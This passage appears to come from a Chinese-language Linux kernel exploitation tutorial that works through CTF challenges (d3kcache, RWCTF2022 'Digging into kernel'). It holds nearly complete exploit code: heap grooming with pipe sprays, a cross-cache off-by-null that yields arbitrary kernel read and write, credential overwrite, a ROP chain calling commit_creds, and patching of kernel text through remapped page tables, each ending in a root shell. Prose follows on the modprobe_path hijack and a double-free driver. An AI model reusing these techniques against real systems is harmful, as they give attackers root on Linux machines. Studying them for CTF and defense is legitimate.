    /* Third pipe rewrites the first pipe's buffer, pads up to the next slot, then rewrites the second pipe's buffer. */
    write(pipe_fd[evil_pipe_id[2]][1], &evil_pipe_buf[0], sizeof(info_pipe_buf));
    write(pipe_fd[evil_pipe_id[2]][1], buf, TRD_PIPE_BUF_SZ - sizeof(info_pipe_buf));
    write(pipe_fd[evil_pipe_id[2]][1], &evil_pipe_buf[1], sizeof(info_pipe_buf));
    return write(pipe_fd[evil_pipe_id[0]][1], src, len);
}

/*
 * Build the three self-writing pipes used by arbitrary_read_by_pipe() /
 * arbitrary_write_by_pipe() and derive the globals they depend on.
 *
 * Stages, in order:
 *   1. groom the page allocator and spray pipes whose pipe_buffer arrays are
 *      resized so that they sit next to the driver's 2k objects;
 *   2. trigger the driver's off-by-null write and find the pipe whose first
 *      pipe_buffer now aliases another pipe's page (victim / orig pair);
 *   3. free the original, resize the other pipes so that a pipe_buffer array
 *      lands on the freed page, and leak a pipe_buffer (kernel_offset);
 *   4. repeat once more to get a second-level victim, then forge three
 *      pipe_buffers that point at their own page (evil_pipe_id[0..2]);
 *   5. locate vmemmap_base, the current task_struct and page_offset_base.
 *
 * On success evil_pipe_id[], evil_pipe_buf[], kernel_offset, vmemmap_base,
 * current_task and page_offset_base are set. Any failed stage prints a
 * message and exits. The statement order is significant throughout.
 */
void self_write_pipe_init() {
    prepare_pgv_system();
    prepare_pgv_pages();

    puts("[*] spray pipe_buffer...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (pipe(pipe_fd[i]) < 0) {
            perror("[-] failed to create pipe.");
            exit(-1);
        }
    }

    puts("[*] exetend pipe_buffer...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        /* Hand one sprayed 8-page block back to the allocator for every 8 pipes resized. */
        if (i % 8 == 0) {
            free_page(pgv_8pages_start_idx++);
        }
        /* Resize the ring to 64 slots so the pipe_buffer array is reallocated. */
        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0) {
            perror("[-] failed to extend pipe.");
            exit(-1);
        }
        /* Half-way through, allocate all driver objects so that they end up between pipe_buffer arrays. */
        if (i == PIPE_SPRAY_NUM / 2) {
            puts("[*] spray vulnerable 2k obj...");
            free_page(pgv_8pages_start_idx++);
            for (int j = 0; j < KCACHE_NUM; j++) {
                kcache_alloc(j, 6, "sky123");
            }
            puts("[*] exetend pipe_buffer...");
        }
    }

    puts("[*] allocating pipe pages...");
    /* Tag every pipe's data page: a 6-byte marker followed by eight copies of the pipe's own index. */
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        write(pipe_fd[i][1], "sky123", 6);
        for (int j = 0; j < 8; j++) {
            write(pipe_fd[i][1], &i, sizeof(int));
        }
    }

    puts("[*] trigerring cross-cache off-by-null...");
    memset(buf, 0, sizeof(buf)); // zero the source data first; the original author notes it is unclear why this is needed
    /* Each object already holds 6 bytes, so writing KCACHE_SIZE - 6 more fills it exactly and triggers the driver's trailing NUL store. */
    for (int i = 0; i < KCACHE_NUM; i++) {
        kcache_write(i, KCACHE_SIZE - 6, buf);
    }

    /* A pipe that reads back the marker followed by a foreign index is now looking at another pipe's page. */
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        int nr;
        read(pipe_fd[i][0], buf, 6);
        read(pipe_fd[i][0], &nr, sizeof(int));
        if (!memcmp(buf, "sky123", 6) && nr != i) {
            orig_pipe_id[0] = nr, victim_pip_id[0] = i;
            printf("[+] find victim: %d, orig: %d.\n", victim_pip_id[0], orig_pipe_id[0]);
        }
    }

    if (orig_pipe_id[0] == -1) {
        puts("[-] failed to corrupt pipe_buffer.");
        exit(-1);
    }

    /* Ring size that makes the pipe_buffer array SND_PIPE_BUF_SZ bytes large. */
    size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ / sizeof(struct pipe_buffer));
    /* Advance the victim's write position so that, together with the 6 + 8 * 4 bytes already written, it stands at 2 * SND_PIPE_BUF_SZ. */
    write(pipe_fd[victim_pip_id[0]][1], buf, SND_PIPE_BUF_SZ * 2 - 6 - 8 * sizeof(int));

    puts("[*] free original pipe...");
    close(pipe_fd[orig_pipe_id[0]][0]);
    close(pipe_fd[orig_pipe_id[0]][1]);

    /* Resize all remaining pipes so that one of the new pipe_buffer arrays reuses the page just released. */
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i == orig_pipe_id[0] || i == victim_pip_id[0]) {
            continue;
        }
        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0) {
            perror("[-] failed to extend pipe.");
            exit(-1);
        }
    }

    /* Skip forward in the victim pipe, then read one pipe_buffer worth of data: a live kernel pipe_buffer. */
    read(pipe_fd[victim_pip_id[0]][0], buf, SND_PIPE_BUF_SZ - 6 - sizeof(int));
    read(pipe_fd[victim_pip_id[0]][0], &info_pipe_buf, sizeof(info_pipe_buf));

    qword_dump("leak pipe_buffer", &info_pipe_buf, sizeof(info_pipe_buf));
    /* 0xffffffff82451b30 is presumably the unslid address of the pipe ops table on the target kernel -- TODO confirm. */
    kernel_offset = (size_t) info_pipe_buf.ops - 0xffffffff82451b30;
    printf("[+] kernel offset: %p\n", kernel_offset);

    puts("[*] construct a second-level uaf pipe page...");
    /* Write the leaked pipe_buffer back through the victim, overwriting some pipe's buffer so that it references the same page. */
    write(pipe_fd[victim_pip_id[0]][1], &info_pipe_buf, sizeof(info_pipe_buf));

    /* Same detection as before: a pipe that now reads a foreign, in-range index is the second-level victim. */
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        int nr;
        if (i == orig_pipe_id[0] || i == victim_pip_id[0]) {
            continue;
        }
        read(pipe_fd[i][0], &nr, sizeof(nr));
        if (nr >= 0 && nr < PIPE_SPRAY_NUM && i != nr) {
            orig_pipe_id[1] = nr;
            victim_pip_id[1] = i;
            printf("[+] find second-level victim: %d, orig: %d.\n", victim_pip_id[1], orig_pipe_id[1]);
        }
    }
    if (victim_pip_id[1] == -1) {
        puts("[-] failed to corrupt second-level pipe_buffer.");
        exit(-1);
    }

    /* Ring size that makes the pipe_buffer array TRD_PIPE_BUF_SZ bytes large. */
    size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ / sizeof(struct pipe_buffer));
    /* NOTE(review): sizeof(info_pipe_buf) - 6 - 8 * sizeof(int) is 40 - 38 = 2 bytes; presumably this aligns the write position -- confirm. */
    write(pipe_fd[victim_pip_id[1]][1], buf, sizeof(info_pipe_buf) - 6 - 8 * sizeof(int));

    puts("[*] free second-level original pipe...");
    close(pipe_fd[orig_pipe_id[1]][0]);
    close(pipe_fd[orig_pipe_id[1]][1]);

    puts("[*] fcntl() to set the pipe_buffer on second-level victim page...");
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        if (i == orig_pipe_id[0] || i == orig_pipe_id[1] || i == victim_pip_id[0] || i == victim_pip_id[1]) {
            continue;
        }
        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0) {
            perror("[-] failed to extend pipe.");
            exit(-1);
        }
    }

    /* Forge three pipe_buffers, one per iteration, each pointing at the page that holds the pipe_buffer arrays themselves. */
    for (int i = 0; i < 3; i++) {
        puts("[*] hijacking pipe_buffer on page to itself...");
        memcpy(&evil_pipe_buf[i], &info_pipe_buf, sizeof(info_pipe_buf));
        evil_pipe_buf[i].offset = TRD_PIPE_BUF_SZ;
        evil_pipe_buf[i].len = TRD_PIPE_BUF_SZ;
        /* Pad to the next TRD_PIPE_BUF_SZ slot, then drop the forged buffer at its start. */
        write(pipe_fd[victim_pip_id[1]][1], buf, TRD_PIPE_BUF_SZ - sizeof(info_pipe_buf));
        write(pipe_fd[victim_pip_id[1]][1], &evil_pipe_buf[i], sizeof(info_pipe_buf));

        /* The pipe whose first 8 bytes now equal the leaked page pointer is reading its own pipe_buffer array. */
        for (int j = 0; j < PIPE_SPRAY_NUM; j++) {
            if (j == orig_pipe_id[0] || j == orig_pipe_id[1] || j == victim_pip_id[0] || j == victim_pip_id[1]) {
                continue;
            }
            /* Skip pipes already claimed in an earlier iteration. */
            bool flag = false;
            for (int k = 0; k < i; k++) {
                if (j == evil_pipe_id[k]) {
                    flag = true;
                    break;
                }
            }
            if (flag) {
                continue;
            }
            struct page *page_ptr;
            read(pipe_fd[j][0], &page_ptr, sizeof(page_ptr));
            if (page_ptr == info_pipe_buf.page) {
                evil_pipe_id[i] = j;
                printf("[+] find self-writing pipe: %d\n", evil_pipe_id[i]);
            }
        }
        if (evil_pipe_id[i] == -1) {
            puts("[-] failed to build self-writing pipe.");
            exit(-1);
        }
    }

    /* Initial state of the ring: the second pipe writes at slot 3 (the third pipe's buffer), the third at slot 1 (the first pipe's buffer). */
    evil_pipe_buf[1].offset = TRD_PIPE_BUF_SZ * 3;
    evil_pipe_buf[1].len = 0;
    write(pipe_fd[evil_pipe_id[2]][1], &evil_pipe_buf[1], sizeof(info_pipe_buf));

    evil_pipe_buf[2].offset = TRD_PIPE_BUF_SZ;
    evil_pipe_buf[2].len = 0;

    /*
     * Search for vmemmap_base: start from the leaked page pointer rounded
     * down to 0x10000000 and step downwards until the page for physical
     * address 0x9d000 begins with the address of secondary_startup_64.
     * NOTE: the loop has no lower bound and only ends on a match.
     */
    vmemmap_base = (size_t) info_pipe_buf.page & 0xfffffffff0000000;
    while (true) {
        arbitrary_read_by_pipe((void *) vmemmap_base + 0x9d000 / 0x1000 * 0x40, buf);
        if (kernel_offset + 0xFFFFFFFF81000070 == buf[0]) {
            printf("[+] find secondary_startup_64: %p\n", buf[0]);
            break;
        }
        vmemmap_base -= 0x10000000;
    }
    printf("[+] vmemmap_base: %p\n", vmemmap_base);

    puts("[*] seeking task_struct in memory...");
    /* Give this task a recognisable comm, then scan physical pages for it. */
    prctl(PR_SET_NAME, "1145141919810");
    for (int i = 0;; i++) {
        ssize_t len = arbitrary_read_by_pipe((void *) vmemmap_base + i * 0x40, buf);
        size_t *comm = memmem(buf, len, "1145141919810", 13);
        /*
         * Accept the hit only if the qwords at fixed distances before comm
         * look like direct-mapping pointers. comm[-50] is presumably a
         * self-referencing list head located 2528 bytes into task_struct
         * on the target kernel -- TODO confirm the offsets.
         */
        if (comm && is_dir_mapping_addr(comm[-2])
            && is_dir_mapping_addr(comm[-57])
            && is_dir_mapping_addr(comm[-56])) {
            current_task = comm[-50] - 2528;
            /* Page i holds this task, so its direct-map address minus i pages gives the base, rounded down to 0x10000000. */
            page_offset_base = (comm[-50] & 0xfffffffffffff000) - i * 0x1000;
            page_offset_base &= 0xfffffffff0000000;
            printf("[+] find currtent task_struct: %p\n", current_task);
            printf("[+] page_offset_base: %p\n", page_offset_base);
            break;
        }
    }
}

/*
 * Escalate by copying another task's credential pointer into the current
 * task_struct, then spawn /bin/sh.
 *
 * All task_struct offsets below (0x8D0, 0x998, 0xB58, 0xB60) are specific to
 * the target kernel build; their field names are not visible in this chunk.
 */
void privilege_escalation_by_task_overwrite() {
    /* finding the init_task, the final parent of every task */
    puts("[*] Seeking for init_task...");
    size_t init_cred;
    size_t task = current_task;
    while (true) {
        /* Read the page holding `task` and the following page, since the structure may straddle a page boundary. */
        arbitrary_read_by_pipe(direct_map_addr_to_page_addr(task), buf);
        arbitrary_read_by_pipe((void *) direct_map_addr_to_page_addr(task) + 0x40, &buf[0x1000 / 8]);
        /* Stop at the task whose 32-bit field at +0x998 is zero (presumably pid == 0) and take its pointer at +0xB60. */
        if ((buf[((task & 0xFFF) + 0x998) / 8] & 0xFFFFFFFF) == 0) {
            init_cred = buf[((task & 0xFFF) + 0xB60) / 8];
            printf("[+] find init_cred: %p\n", init_cred);
            break;
        }
        /* Follow the pointer stored at +0x8D0 and subtract 0x8D0 to get the next task_struct (presumably an embedded list node). */
        task = buf[((task & 0xFFF) + 0x8D0) / 8] - 0x8D0;
    }

    /* Re-read the current task, patch both pointer slots, and write the two pages back. */
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(current_task), buf);
    arbitrary_read_by_pipe((void *) direct_map_addr_to_page_addr(current_task) + 0x40, &buf[0x1000 / 8]);
    buf[((current_task & 0xFFF) + 0xB58) / 8] = init_cred;
    buf[((current_task & 0xFFF) + 0xB60) / 8] = init_cred;
    /* Only the first 0xff0 bytes of each page are written back. */
    arbitrary_write_by_pipe(direct_map_addr_to_page_addr(current_task), buf, 0xff0);
    arbitrary_write_by_pipe((void *) direct_map_addr_to_page_addr(current_task) + 0x40, &buf[0x1000 / 8], 0xff0);
    system("/bin/sh");
}

/* Kernel stack address and page-global-directory address of the current task, filled in by pgd_vaddr_init(). */
size_t stack_addr, pgd_addr;

/*
 * Read the current task_struct and its mm_struct to obtain stack_addr and
 * pgd_addr. The offsets (0x20, 0x920 in task_struct; 0x48 in mm_struct) are
 * specific to the target kernel build. Requires current_task,
 * vmemmap_base and page_offset_base to be set already.
 */
void pgd_vaddr_init() {
    /* Read the page holding the task_struct and the following page. */
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(current_task), buf);
    arbitrary_read_by_pipe((void *) direct_map_addr_to_page_addr(current_task) + 0x40, &buf[0x1000 / 8]);
    stack_addr = buf[((current_task & 0xFFF) + 0x20) / 8];
    printf("[*] kernel stack addr: %p\n", stack_addr);
    size_t mm_struct_addr = buf[((current_task & 0xFFF) + 0x920) / 8];
    printf("[*] mm_struct addr: %p\n", mm_struct_addr);
    /* Same two-page read for the mm_struct. */
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(mm_struct_addr), buf);
    arbitrary_read_by_pipe((void *) direct_map_addr_to_page_addr(mm_struct_addr) + 0x40, &buf[0x1000 / 8]);
    pgd_addr = buf[((mm_struct_addr & 0xFFF) + 0x48) / 8];
    printf("[*] pgd addr: %p\n", pgd_addr);
}

/* Bit position at which each paging level's 9-bit table index starts inside a virtual address. */
#define PTE_OFFSET 12
#define PMD_OFFSET 21
#define PUD_OFFSET 30
#define PGD_OFFSET 39

/* Nine index bits per level (512 entries per table). Written in hex because binary literals are not standard C11. */
#define PT_ENTRY_MASK 0x1FFUL
#define PTE_MASK (PT_ENTRY_MASK << PTE_OFFSET)
#define PMD_MASK (PT_ENTRY_MASK << PMD_OFFSET)
#define PUD_MASK (PT_ENTRY_MASK << PUD_OFFSET)
#define PGD_MASK (PT_ENTRY_MASK << PGD_OFFSET)

/*
 * Table index of `addr` at each level. The argument is parenthesized so
 * that an expression such as PTE_ENTRY(base | off) shifts the whole value
 * rather than only its last operand.
 */
#define PTE_ENTRY(addr) (((addr) >> PTE_OFFSET) & PT_ENTRY_MASK)
#define PMD_ENTRY(addr) (((addr) >> PMD_OFFSET) & PT_ENTRY_MASK)
#define PUD_ENTRY(addr) (((addr) >> PUD_OFFSET) & PT_ENTRY_MASK)
#define PGD_ENTRY(addr) (((addr) >> PGD_OFFSET) & PT_ENTRY_MASK)

/* Page-table entry flag bits: bit 1 (writable) and bit 63 (no-execute). */
#define PAGE_RW (1ULL << 1)
#define PAGE_NX (1ULL << 63)

size_t vaddr_to_paddr_for_4_level(size_t vaddr) {
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pgd_addr), buf);
    size_t pud_vaddr = ((buf[PGD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pud_vaddr), buf);
    size_t pmd_vaddr = ((buf[PUD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pmd_vaddr), buf);
    size_t pte_vaddr = ((buf[PMD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pte_vaddr), buf);
    return ((buf[PTE_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) | (vaddr & 0xFFF);
}

size_t vaddr_to_paddr_for_3_level(size_t vaddr) {
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pgd_addr), buf);
    size_t pud_vaddr = ((buf[PGD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pud_vaddr), buf);
    size_t pmd_vaddr = ((buf[PUD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pmd_vaddr), buf);
    return ((buf[PMD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) | (vaddr & 0x1FFFFF);
}

/*
 * Point the PTE of vaddr at the physical frame containing paddr.
 *
 * Walks PGD -> PUD -> PMD from the global pgd_addr to find the PTE page,
 * replaces the entry for vaddr, and writes the page back with the pipe
 * write primitive.
 *
 * NOTE(review): only 0xff0 bytes of the PTE page are written back, so an
 * entry at index 510 or 511 would not be updated - confirm this cannot
 * happen for the addresses used.
 */
void vaddr_remapping(size_t vaddr, size_t paddr) {
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pgd_addr), buf);
    size_t pud_vaddr = ((buf[PGD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pud_vaddr), buf);
    size_t pmd_vaddr = ((buf[PUD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pmd_vaddr), buf);
    size_t pte_vaddr = ((buf[PMD_ENTRY(vaddr)] & (~0xFFF)) & (~PAGE_NX)) + page_offset_base;
    arbitrary_read_by_pipe(direct_map_addr_to_page_addr(pte_vaddr), buf);
    /*
     * New entry: frame of paddr plus flag bits 0x8000000000000867. That sets
     * bit 63 (PAGE_NX) and bit 1 (PAGE_RW, i.e. writable); the remaining low
     * bits are presumably present/user/accessed/dirty - TODO confirm.
     */
    buf[PTE_ENTRY(vaddr)] = (paddr & (~0xFFF)) | 0x8000000000000867;
    arbitrary_write_by_pipe(direct_map_addr_to_page_addr(pte_vaddr), buf, 0xff0);
}

/*
 * Replace the current process image with an interactive /bin/sh.
 * Used as the user-space return target of the ROP chain.
 */
void get_shell(void) {
    char *shell_argv[3];

    shell_argv[0] = "/bin/sh";
    shell_argv[1] = "-i";
    shell_argv[2] = NULL;

    /* No environment is passed to the new program. */
    execve(shell_argv[0], shell_argv, NULL);
}

/*
 * Escalate privileges by overwriting the current task's kernel stack with a
 * ROP chain through the pipe write primitive.
 *
 * Steps:
 *   1. Resolve the kernel stack and PGD (pgd_vaddr_init), then translate the
 *      stack address into its direct-mapping alias.
 *   2. Save the user-mode context (save_status) for the final return frame.
 *   3. Build the chain in buf: a long `ret` sled followed by
 *      commit_creds(init_cred) and a return to user mode at get_shell.
 *   4. Write the chain over the stack page at offset 0x3000.
 *
 * NOTE(review): every gadget/symbol address below is specific to one kernel
 * build and is only relocated by kernel_offset.
 */
void privilege_escalation_by_rop() {
    pgd_vaddr_init();
    stack_addr = vaddr_to_paddr_for_4_level(stack_addr) + page_offset_base;
    /* %p requires a void *; passing a size_t directly is a format mismatch. */
    printf("[*] stack addr on direct mapping space: %p\n", (void *) stack_addr);
    save_status();

    size_t ret = 0xffffffff8107af08 + kernel_offset;
    size_t pop_rdi_ret = 0xffffffff818710dd + kernel_offset;
    size_t init_cred = 0xFFFFFFFF83079EE8 + kernel_offset;
    size_t commit_creds = 0xFFFFFFFF811284E0 + kernel_offset;
    size_t swapgs_restore_regs_and_return_to_usermode = 0xFFFFFFFF82201A90 + kernel_offset;

    size_t *rop = buf;
    /* ret sled: wherever the saved return address lies in the page, execution
     * slides into the real chain placed in the last 0x100 bytes. */
    for (int i = 0; i < ((0x1000 - 0x100) / 8); i++) { *rop++ = ret; }
    *rop++ = pop_rdi_ret;
    *rop++ = init_cred;
    *rop++ = commit_creds;
    *rop++ = swapgs_restore_regs_and_return_to_usermode + 0x36;
    /* Two slots are skipped and keep whatever buf already held; presumably
     * they are consumed by the trampoline entered at +0x36 - TODO confirm. */
    rop++;
    rop++;
    /* User-mode return frame: rip, cs, rflags, rsp, ss. */
    *rop++ = (size_t) get_shell;
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop++ = user_ss;

    puts("[*] hijacking current task's stack...");
    arbitrary_write_by_pipe(direct_map_addr_to_page_addr(stack_addr + 0x1000 * 3), buf, 0xff0);
}

/*
 * Escalate privileges by mapping kernel text into user space and patching it.
 *
 * Steps:
 *   1. Resolve the PGD (pgd_vaddr_init) and translate ns_capable_setid's
 *      virtual address to a physical address.
 *   2. mmap two anonymous pages and touch them so their PTEs exist.
 *   3. Rewrite both PTEs (vaddr_remapping) to point at the two physical
 *      pages starting at the page containing ns_capable_setid.
 *   4. Overwrite the function's first bytes with `mov rax, 1; ret`.
 *   5. Call setresuid(0, 0, 0) and spawn a shell.
 *
 * NOTE(review): the ns_capable_setid address is specific to one kernel build.
 */
void privilege_escalation_by_usma() {
    pgd_vaddr_init();

    size_t ns_capable_setid_vaddr = 0xFFFFFFFF810FD2A0 + kernel_offset;
    /* %p requires a void *; passing a size_t directly is a format mismatch. */
    printf("[*] ns_capable_setid vaddr: %p\n", (void *) ns_capable_setid_vaddr);
    size_t ns_capable_setid_paddr = vaddr_to_paddr_for_3_level(ns_capable_setid_vaddr);
    printf("[*] ns_capable_setid vaddr in dir map: %p\n", (void *) (ns_capable_setid_paddr + page_offset_base));
    size_t ns_capable_setid_page_paddr = ns_capable_setid_paddr & ~0xFFF;

    char *code_mmap = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (code_mmap == MAP_FAILED) {
        /* Without the mapping there is nothing to remap; memset would fault. */
        perror("[-] failed to mmap the remapping window");
        exit(-1);
    }
    /* Touch both pages so that page-table entries exist before remapping. */
    memset(code_mmap, 0, 0x2000);

    /* Two pages are remapped so a patch near the end of the first still fits. */
    vaddr_remapping((size_t) code_mmap, ns_capable_setid_page_paddr);
    vaddr_remapping((size_t) code_mmap + 0x1000, ns_capable_setid_page_paddr + 0x1000);
    /* Presumably gives stale translations time to be dropped - TODO confirm. */
    sleep(1);

    byte_dump("code_mmap", code_mmap + (ns_capable_setid_paddr & 0xFFF), 0x100);
    /* 48 c7 c0 01 00 00 00 c3 : mov rax, 1 ; ret */
    uint8_t shellcode[] = {0x48, 0xc7, 0xc0, 0x1, 0x0, 0x0, 0x0, 0xc3};
    memcpy(code_mmap + (ns_capable_setid_paddr & 0xFFF), shellcode, sizeof(shellcode));

    setresuid(0, 0, 0);
    system("/bin/sh");
}


/*
 * Entry point of the d3kcache exploit.
 *
 * Opens the vulnerable device, sets up the self-writing pipe primitive and
 * then runs one of three privilege-escalation strategies chosen by argv[1]:
 *   "rop"   - kernel-stack ROP chain
 *   "usma"  - remap and patch kernel text from user space
 *   other / absent - overwrite the task's credentials
 */
int main(int argc, char **argv, char **envp) {
    bind_core(true, false);

    kcache_fd = open("/dev/d3kcache", O_RDWR);
    if (kcache_fd < 0) {
        perror("[-] failed to open d3kcache.🤔");
        exit(-1);
    }

    self_write_pipe_init();

    /* argv[1] is NULL when no strategy was given on the command line. */
    const char *technique = argv[1];

    if (technique != NULL && strcmp(technique, "rop") == 0) {
        privilege_escalation_by_rop();
        return 0;
    }
    if (technique != NULL && strcmp(technique, "usma") == 0) {
        privilege_escalation_by_usma();
        return 0;
    }

    privilege_escalation_by_task_overwrite();
    return 0;
}

Arbitrary Address Allocation

通过 uaf 修改 object 的 free list 指针实现任意地址分配。与 glibc 不同的是，内核的 slub 堆管理器缺少检查，因此对要分配的目标地址要求不高，不过有一点需要注意：当我们分配到目标地址时，目标地址前 8 字节的数据会被当作 next 指针写入 freelist，而这通常并非一个有效的地址，后续分配时会导致 kernel panic，因此在任意地址分配时最好确保目标 object 的 free list 字段为 NULL 。

当能够任意地址分配的时候，与 glibc 改 hook 类似，在内核中通常修改的是 modprobe_path 。modprobe_path 是内核中的一个变量，其值为 /sbin/modprobe ，因此对于缺少符号的内核文件可以通过搜索 /sbin/modprobe 字符串的方式定位这个变量。

当我们尝试去执行（execve）一个非法的文件（file magic not found），内核会经历如下调用链：

entry_SYSCALL_64()
    sys_execve()
        do_execve()
            do_execveat_common()
                bprm_execve()
                    exec_binprm()
                        search_binary_handler()
                            __request_module() // wrapped as request_module
                                call_modprobe()

其中 call_modprobe() 定义于 kernel/kmod.c，我们主要关注这部分代码：

static int call_modprobe(char *module_name, int wait)
{
	//...
	argv[0] = modprobe_path;
	argv[1] = "-q";
	argv[2] = "--";
	argv[3] = module_name;	/* check free_modprobe_argv() */
	argv[4] = NULL;

	info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
					 NULL, free_modprobe_argv, NULL);
	if (!info)
		goto free_module_name;

	return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
	//...

在这里调用了函数 call_usermodehelper_exec() 将 modprobe_path 作为可执行文件路径以 root 权限将其执行。
我们不难想到的是：若是我们能够劫持 modprobe_path，将其改写为我们指定的恶意脚本的路径，随后我们再执行一个非法文件，内核将会以 root 权限执行我们的恶意脚本。

例题：RWCTF2022高校赛 - Digging into kernel 1 & 2

附件下载链接
xkmod_init 创建了一个名为 lalala 的 kmem_cache 。分配大小为 192 ，不过由于没有设置 SLAB_ACCOUNT 因此会和 kmalloc-192 合并，这里我们按照 SLAB_ACCOUNT 设置的情况来做。

/*
 * Decompiled module init: registers the misc device, creates the
 * kmem_cache that xkmod_ioctl allocates from, and clears the global buf.
 */
int __cdecl xkmod_init()
{
  __int64 v0; // rsi
  kmem_cache *v1; // rax

  printk((char *)&byte_1E4, v0);
  misc_register(&xkmod_device);
  /* Cache named "lalala" with 192-byte objects; remaining arguments are 0. */
  v1 = (kmem_cache *)kmem_cache_create("lalala", 192LL, 0LL, 0LL, 0LL);
  buf = 0LL;
  s = v1;
  return 0;
}

xkmod_ioctl 有读，写，分配三个功能，其中分配是从 xkmod_init 创建的 kmem_cache 中分配。

/*
 * Decompiled ioctl handler. Copies a 16-byte request from user space and
 * dispatches on op:
 *   0x1111111 - allocate a fresh object from cache s into the global buf
 *   0x6666666 - copy input.size bytes from user memory into buf + input.index
 *   0x7777777 - copy input.size bytes from buf + input.index to user memory
 * Read and write both require buf != NULL, size <= 0x50 and index <= 0x70;
 * otherwise the cold path is taken. buf is a single global shared by every
 * open file descriptor.
 */
void __fastcall xkmod_ioctl(__int64 a1, int op, char *a3)
{
  void *p_input; // rdi
  char *v5; // rsi
  Input input; // [rsp+0h] [rbp-20h] BYREF
  unsigned __int64 v7; // [rsp+10h] [rbp-10h]

  v7 = __readgsqword(0x28u);
  if ( a3 )
  {
    p_input = &input;
    v5 = a3;
    copy_from_user(&input, a3, 16LL);
    if ( op == 0x6666666 )
    {
      /* write: user -> kernel object */
      p_input = buf;
      if ( buf && input.size <= 0x50u && input.index <= 0x70u )
      {
        copy_from_user(&buf[input.index], input.buf, input.size);
        return;
      }
    }
    else
    {
      if ( op != 0x7777777 )
      {
        /* allocate: the previous buf pointer is simply overwritten */
        if ( op == 0x1111111 )
          buf = (char *)kmem_cache_alloc(s, 0xCC0LL);
        return;
      }
      /* read: kernel object -> user */
      v5 = buf;
      if ( buf && input.size <= 0x50u && input.index <= 0x70u )
      {
        copy_to_user(input.buf, &buf[input.index], input.size);
        return;
      }
    }
    xkmod_ioctl_cold((__int64)p_input, (__int64)v5);
  }
}

xkmod_release 是驱动自定义的 release 函数，在调用 close 关闭句柄时会调用，显然我们可以关闭多个句柄来实现 double free 。

/*
 * Decompiled release handler, run when a descriptor of the device is closed.
 * Frees the global buf back to cache s but never clears the pointer, so buf
 * stays dangling and every further close frees the same pointer again.
 */
int __fastcall xkmod_release(inode *inode, file *file)
{
  return kmem_cache_free(s, buf);
}

关于内核基址获取，在内核“堆基址”（page_offset_base） + 0x9d000 处存放着 secondary_startup_64 函数的地址，而我们可以从 free object 的 next 指针获得一个堆上地址，从而去猜测堆的基址，之后分配到一个堆基址 + 0x9d000 处的 object 以泄露内核基址，这个地址前面刚好有一片为 NULL 的区域方便我们分配。

#define __PAGE_OFFSET           page_offset_base
#define PAGE_OFFSET		((unsigned long)__PAGE_OFFSET)
#define __va(x)			((void *)((unsigned long)(x)+PAGE_OFFSET))

	/* Must be perfomed *after* relocation. */
	trampoline_header = (struct trampoline_header *)
		__va(real_mode_header->trampoline_header);
	...
	trampoline_header->start = (u64) secondary_startup_64;

至于 page_offset_base 可以通过 object 上的 free list 泄露的堆地址与上 0xFFFFFFFFF0000000 获取。

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <ctype.h>
#include <fcntl.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

size_t modprobe_path = 0xFFFFFFFF82444700;

/*
 * Hex-dump a memory region as rows of four 64-bit words followed by the
 * printable-ASCII rendering of the same bytes.
 *
 * desc - optional heading printed before the dump (may be NULL)
 * addr - start of the region
 * len  - region length in bytes; only whole 8-byte words are shown in the
 *        hex columns, and nothing is printed when len < 8
 */
void qword_dump(char *desc, void *addr, int len) {
    uint64_t *qwords = (uint64_t *) addr;
    uint8_t *bytes = (uint8_t *) addr;
    int qword_count = len / 8;

    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }

    for (int row = 0; row < qword_count; row += 4) {
        int row_off = row * 8;

        /* Byte offset of the row. */
        printf("  %04x", row_off);

        /* Up to four words; missing ones are padded to keep columns aligned. */
        for (int col = 0; col < 4; col++) {
            if (row + col < qword_count) {
                printf(" 0x%016lx", qwords[row + col]);
